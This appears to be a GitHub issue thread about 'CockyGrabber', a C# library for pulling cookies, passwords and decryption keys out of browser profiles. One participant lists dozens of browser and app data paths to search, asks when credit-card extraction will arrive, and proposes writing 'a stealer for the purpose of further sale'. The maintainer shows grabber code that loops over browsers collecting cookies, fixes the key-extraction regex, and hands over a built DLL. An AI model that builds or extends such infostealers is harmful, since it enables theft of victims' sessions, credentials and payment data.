YandexBrowser Not Working! Error in GetKey() method of BlinkGrabber

[ProrockDev]

Google Chrome Local State: "os_crypt":{"encrypted_key": YandexBrowser Local State: "os_crypt":{"checker_state": "counter":0,"encrypted_data":"blabla="},"encrypted_key":

The regular expression in the GetKey() method is written incorrectly. Might be worth using json decoding to solve this.

[MoistCoder]

I downloaded Yandex on a virtual machine and analyzed the Local State file with a JSON parser.

I don't see {"checker_state": "counter":0,"encrypted_data":"..."},"encrypted_key". The only thing that is in my os_crypt object is encrypted_key.

[ProrockDev]

Possibly different browser versions. But I have the way I described above and your regular expression does not work. Please fix the problem, or make the GetGey() method virtual so that I can inherit it and override it;

I'm also wondering when the next updates will be.

[ProrockDev]

[MoistCoder]

Possibly different browser versions

What version do you use?

[...] or make the GetGey() method virtual so that I can inherit it and override it

That's a good idea. I'll try to fix the problem myself but I also will make the method virtual.

I'm also wondering when the next updates will be

The main reason why it's taking so long is because of the custom SQLite reader. The newest version right now (2.3) is using System.Data.SQLite. I planned to add an SQLiteReader class that can read databases without any references. I've had a lot of problems with it and needed to learn the SQLite file format. And until now there are still some bugs that I would like to fix first before I'm gonna release it.

[ProrockDev]

Can you release v2.3.1 with the GetKey() virtual method?

[MoistCoder]

Ok I'm gonna try to release it later

[ProrockDev]

Also, maybe you should add functionality first, like credit cards? And only then write custom Sqlite libraries?

[ProrockDev]

Also, maybe you should not create separate classes for each browser, but make an automatic search for browsers in UniversalGrabber? Here are the main

Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Google\Chrome\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Battle.net"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chromium\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Google(x86)\Chrome\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Roaming\Opera Software\Opera GX Stable"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Roaming\Opera Software\Opera Stable"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\MapleStudio\ChromePlus\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Iridium\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\7Star\7Star\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CentBrowser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chedot\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Vivaldi\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Kometa\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Elements Browser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Epic Privacy Browser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\uCozMedia\Uran\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CatalinaGroup\Citrio\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Coowon\Coowon\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\liebao\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\QIP Surf\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Orbitum\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Comodo\Dragon\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Amigo\User\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Torch\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Yandex\YandexBrowser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Comodo\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\360Browser\Browser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Maxthon3\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\K-Melon\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Sputnik\Sputnik\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Nichrome\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CocCoc\Browser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Uran\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Chromodo\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Mail.Ru\Atom\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\BraveSoftware\Brave-Browser\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\Microsoft\Edge\User Data"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\NVIDIA Corporation\NVIDIA GeForce Experience"), Path.Combine(Environment.ExpandEnvironmentVariables("%USERPROFILE%"),"AppData\Local\CryptoTab Browser\User Data")

[ProrockDev]

Search for these directories. If the directory exists, find Local State and other files in it

[MoistCoder]

I don't think it's a good way to find those. I like clean code so I prefer classes for different Browsers. Currently, the UniversalGrabber has a good algorithm in my opinion:

        private readonly BlinkGrabber[] BlinkGrabbers =
        {
            new ChromeGrabber(),
            new BraveGrabber(),
            new VivaldiGrabber(),
            new OperaGrabber(),
            new OperaGxGrabber(),
            new EdgeGrabber(),
        };
        private readonly GeckoGrabber[] GeckoGrabbers =
        {
            new FirefoxGrabber(),
        };
        public IEnumerable<Blink.Cookie> GetAllBlinkCookies()
        {
            List<Blink.Cookie> cookies = new List<Blink.Cookie>();

            foreach (BlinkGrabber g in BlinkGrabbers)
            {
                // Add Cookies to list:
                if (g.CookiesExist())
                    cookies.AddRange(g.GetCookies());
            }

            return cookies;
        }

I just need to add more Browsers to the Array and that's it. The UniversalGrabber already checks if the Cookies and such exist. (There isn't currently an if statement that checks if the key exists. I need to add that but everything else works fine)

[MoistCoder]

I wrote a new regex expression: regexr.com/6m4ll Can you paste the content of the Local State file in it and see if "os_crypt": {"encrypted_key": "..."} is blue (is matched)? Can you also click on the match and go to details? The encrypted_key should be is the 'encKey' row

[ProrockDev]

Indeed, the regular expression works. But why not do a simple JSON parse? Please release an update so I can download the .dll Can I find out an approximate time when credit cards will be parsed? You would not like to participate in writing a stealer for the purpose of further sale. Together it would be faster to write code.

[MoistCoder]

Indeed, the regular expression works. But why not do a simple JSON parse?

unnecessary. It's faster to do a simple regex replace instead of loading a JsonSerializer class that takes space in memory.

Please release an update so I can download the .dll

If you need it that much then you can build the project yourself

Can I find out an approximate time when credit cards will be parsed?

probably until v2.4

You would not like to participate in writing a stealer for the purpose of further sale. Together it would be faster to write code.

idk. I can't be sure that you aren't a skid. I encountered a lot of those.

[ProrockDev]

Can we continue communication in Jabber or Telegram?

[MoistCoder]

Can we continue communication in Jabber or Telegram?

Idk what Jabber is and i got banned from telegram lmao

[ProrockDev]

Jabber is an xampp client

[ProrockDev]

Or name another client in which you can safely conduct correspondence, we will continue communication there

[MoistCoder]

Or name another client in which you can safely conduct correspondence, we will continue communication there

I would suggest discord. I don't think we are going to be targeted by the FBI for talking lol.

btw I've built a DLL for you: CockyGrabber.zip. It should work. If not tell me.

[ProrockDev]

Everything works, thank you. Cookies are parsed successfully. Only passwords in this browser are encrypted somehow differently, I have not figured it out yet. It is quite popular in the CIS. I'll contact you on Discord soon.